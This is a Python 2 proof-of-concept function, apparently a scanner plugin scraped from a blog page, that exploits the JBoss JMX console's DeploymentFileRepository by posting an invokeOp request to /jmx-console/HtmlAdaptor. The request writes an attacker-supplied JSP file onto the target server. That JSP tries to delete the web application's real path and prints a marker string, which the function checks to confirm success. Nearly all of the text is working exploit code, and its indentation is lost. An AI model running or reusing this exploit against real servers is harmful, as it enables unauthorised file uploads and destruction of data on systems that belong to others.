def verify(cls, args):
verify_code = ('\n<%@ page import="java.util.*,java.io.*" %>\n<%@ page import="'
'java.io.*"%>\n<%\nString path=request.getRealPath("");\nout.prin'
'tln(path);\nFile d=new File(path);\nif(d.exists()){\n d.delete()'
';\n }\n%>\n<% out.println("this_is_not_exist_9.1314923");%>')
payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'
'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')
verify_data = payload % urllib2.quote(verify_code)
verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
page_content = ''
request = urllib2.Request(verify_url, verify_data)
response = urllib2.urlopen(request)
page_content = response.read()
if 'this_is_not_exist_9.1314923' in page_content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
return args
评论列表
文章目录
